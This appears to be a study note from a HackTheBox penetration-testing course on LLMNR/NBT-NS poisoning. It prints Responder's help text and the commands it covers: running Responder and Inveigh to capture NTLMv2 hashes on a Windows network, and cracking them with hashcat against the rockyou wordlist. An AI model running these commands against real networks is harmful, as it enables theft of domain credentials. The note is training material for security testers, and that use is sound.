LLMNR/NBT-NS Poisoning - from Linux

Mitre ATT&CK lists this technique as ID: T1557.001, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails.

LLMNR/NBNS spoofing combined with a lack of SMB signing can often lead to administrative access on hosts within a domain.

SMB Relay attacks

NTLMv1 and NTLMv2 are authentication protocols that utilize the LM or NT hash.

Several tools can be used to attempt LLMNR & NBT-NS poisoning:


Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.

Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.

Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.

Both tools can be used to attack the following protocols:


  • DNS

  • MDNS

  • NBNS

  • DHCP

  • ICMP

  • HTTP


  • SMB

  • LDAP

  • WebDAV

  • Proxy Auth

Responder also has support for:



  • FTP, POP3, IMAP, and SMTP auth

RFS85@htb[/htb]$ responder -h
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|

           NBT-NS, LLMNR & MDNS Responder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C

Usage: responder -I eth0 -w -r -f
responder -I eth0 -wrf

  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
  -I eth0, --interface=eth0
                        Network interface to use, you can use 'ALL' as a
                        wildcard for all interfaces
  -i, --ip=
                        Local IP to use (only for OSX)
  -e, --externalip=
                        Poison all requests with another IP address than
                        Responder's one.
  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
  -r, --wredir          Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
                        network. Default: False
  -d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
  -f, --fingerprint     This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
  -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                        Upstream HTTP proxy used by the rogue WPAD Proxy for
                        outgoing requests (format: host:port)
  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                        retrieval. This may cause a login prompt. Default:
  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                        authentication for the proxy. WPAD doesn't need to be
                        ON. This option is highly effective when combined with
                        -r. Default: False
  --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
  -v, --verbose         Increase verbosity.
sudo responder -I ens224

Hashcat crack NTLM Hash

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt 

We must run the tool with sudo privileges or as root and make sure the following ports are available on our attack host for it to function best:

UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353

the -A flag puts us into analyze mode, allowing us to see NBT-NS, BROWSER, and LLMNR requests in the environment without poisoning any responses. We must always supply either an interface or an IP.

Responder config file

cd /usr/share/responder


sudo responder -A -I ens224

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

hashcat -m 5600 hash_wley.txt /usr/share/wordlists/rockyou.txt

Inveigh - Overview

Inveigh can listen to IPv4 and IPv6 and several other protocols, including LLMNR, DNS, mDNS, NBNS, DHCPv6, ICMPv6, HTTP, HTTPS, SMB, LDAP, WebDAV, and Proxy Auth.

Inveigh Parameters


PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> (Get-Command Invoke-Inveigh).Parameters
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

The PowerShell version of Inveigh is the original version and is no longer updated.

PS C:\htb> .\Inveigh.exe
hashcat -m 5600 hash_svc_qualys.txt /usr/share/wordlists/rockyou.txt

Last updated